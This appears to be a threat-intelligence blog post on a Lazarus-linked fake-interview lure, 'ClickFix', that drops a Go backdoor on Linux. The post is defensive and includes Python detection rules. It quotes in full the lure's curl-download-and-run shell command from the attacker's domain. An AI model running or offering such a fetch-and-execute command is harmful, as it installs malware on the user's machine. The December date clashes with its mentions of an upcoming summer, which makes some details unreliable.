Saturday, December 13, 2025

Introducing ClickFix – A New ClickFake Interview Attack Delivering GolangGhost Malware

A newly observed social engineering wave tied to the Lazarus constellation is exploiting the seasonal rush for remote cryptocurrency jobs.

Dubbed “ClickFix”, the lure refines the earlier ClickFake Interview playbook by introducing a new repair-tool twist that incorporates a bespoke Go backdoor, which the Sekoia TDR team calls GolangGhost.

The result is a streamlined infection chain that blends convincing human-resources pretexting with a one-command shell payload, lowering barriers for non-technical marks and widening Lazarus’ reach into cryptocurrency-centric firms.

New ClickFake Interview

How ClickFix Upgrades the ClickFake Interview Ruse

The campaign still begins with LinkedIn messages or recruitment-themed emails that invite candidates to a “recorded video introduction” portal hosted on a look-alike domain (e.g., waventic.com).

Once the visitor grants minimal browser permissions, a pop-up appears, claiming “Access to your camera or microphone is currently blocked” and blaming a “race condition in the Linux camera driver cache.” The screen then walks the user through three steps:

  1. Open a terminal.
  2. Verify that curl is installed.
  3. Run a one-liner:

```bash
curl -k -o /var/tmp/mediadriver.sh https://support.waventic.com/mediadrivers-linux.sh && \
chmod +x /var/tmp/mediadriver.sh && \
nohup bash /var/tmp/mediadriver.sh >/dev/null 2>&1 &
```

This single command silently downloads the ClickFix helper script. Compared to Lazarus’ 2023 ContagiousInterview builds, which relied on macro-enabled DOCX or ISO images, the shell-script delivery removes file-opening friction, evades many attachment filters, and inherits the trust users place in legitimate troubleshooting snippets.

Under the Hood – The GolangGhost Backdoor

mediadriver.sh ultimately drops an ELF executable compiled with Go 1.22, internally branded “ghost”. Technical analysis of recent hashes shows:

  • Dynamic C2 resolution via DNS TXT records, defaulting to port 443 over genuine-looking CDN sub-domains.
  • Persistence through a systemd service named video-helper.service, auto-starting with the multi-user.target.
  • Modular tasking: screenshot capture, clipboard exfiltration, bcrypt-encrypted file theft, and an interactive reverse shell.
  • RC4-like stream cipher for traffic with hard-coded 32-byte keys reused across samples, easing signature-based detection.

GolangGhost’s Go runtime, static linking, and stripped symbols inflate the binary size (~7 MB), but also enable the malware to run unmodified across most 64-bit Linux distributions, a crucial trait for targeting developer workstations in blockchain firms.

Defensive Measures for Security Teams

  • Block outbound curl/wget from browsers or unknown terminals and monitor long-lived bash children of browser processes.
  • Flag systemd services created outside package managers, especially those referencing /tmp or /var/tmp.
  • Inspect DNS TXT look-ups followed by TLS sessions to unfamiliar CDNs; GolangGhost’s beacon interval defaults to 5 minutes.
  • Amplify user awareness: job applicants should never install “driver fixes.” Legitimate recruiters will adapt to the candidate’s environment, rather than vice versa.
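Two of the detections above as runnable logic, an added example rather than anything from the original post or Sekoia: a browser-ancestry check on curl/wget processes, and correlation of a DNS TXT lookup with a following TLS session to the same non-allowlisted host. The JSON-lines event format, the CDN allowlist and the 10-second window are assumptions; the sample telemetry is constructed, reusing only the lure URL from the post.

```python
import json

BROWSERS = {"firefox", "chrome", "chromium", "brave"}
FETCHERS = {"curl", "wget"}
KNOWN_CDNS = {"cdn.example.net"}   # assumed allowlist of CDNs the org already talks to
TXT_TO_TLS_WINDOW = 10.0           # seconds from TXT lookup to TLS connect; assumption, tune it
# Constructed sample telemetry (hypothetical EDR JSON-lines): the lure one-liner run from a
# terminal the browser opened, a benign build-time curl, and DNS/TLS events.
PROCESS_EVENTS = """\
{"pid": 100, "ppid": 1,   "exe": "firefox",        "cmdline": "firefox"}
{"pid": 101, "ppid": 100, "exe": "gnome-terminal", "cmdline": "gnome-terminal"}
{"pid": 102, "ppid": 101, "exe": "bash",           "cmdline": "bash"}
{"pid": 103, "ppid": 102, "exe": "curl",           "cmdline": "curl -k -o /var/tmp/mediadriver.sh https://support.waventic.com/mediadrivers-linux.sh"}
{"pid": 200, "ppid": 1,   "exe": "make",           "cmdline": "make all"}
{"pid": 201, "ppid": 200, "exe": "curl",           "cmdline": "curl -O https://deps.example.org/x.tgz"}
"""
NET_EVENTS = """\
{"t": 0.0,  "kind": "dns_txt", "name": "edge-a1.cdn-assets-placeholder.net"}
{"t": 2.5,  "kind": "tls",     "dst": "edge-a1.cdn-assets-placeholder.net", "port": 443}
{"t": 60.0, "kind": "dns_txt", "name": "cdn.example.net"}
{"t": 61.0, "kind": "tls",     "dst": "cdn.example.net", "port": 443}
"""

def load(lines):
    return [json.loads(l) for l in lines.splitlines() if l.strip()]

def browser_spawned_fetches(events):
    """curl/wget processes with a browser anywhere in their parent chain."""
    by_pid, hits = {e["pid"]: e for e in events}, []
    for e in events:
        if e["exe"] not in FETCHERS:
            continue
        chain, p = [], e
        while p["ppid"] in by_pid:           # walk the parent chain up to the tree root
            p = by_pid[p["ppid"]]
            chain.append(p["exe"])
        if any(x in BROWSERS for x in chain):
            hits.append((e["pid"], " <- ".join(chain)))
    return hits

def txt_then_tls(events):
    """DNS TXT lookup followed within the window by TLS/443 to that same, non-allowlisted host."""
    hits = []
    for i, q in enumerate(events):
        if q["kind"] != "dns_txt" or q["name"] in KNOWN_CDNS:
            continue
        for c in events[i + 1:]:             # events are assumed time-ordered
            if c["t"] - q["t"] > TXT_TO_TLS_WINDOW:
                break
            if c["kind"] == "tls" and c["port"] == 443 and c["dst"] == q["name"]:
                hits.append(q["name"])
    return hits
```

Both rules return the offending process or host so an analyst can pivot; the benign build-time curl and the allowlisted CDN produce no hits.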

The ClickFix variant demonstrates Lazarus’ rapid iteration: shaving steps off the social-engineering funnel while adopting Go tooling that complicates static analysis.

With the crypto sector entering another volatile summer, organizations should strengthen endpoint egress controls and enhance user education to prevent the heat from escalating into a breach.
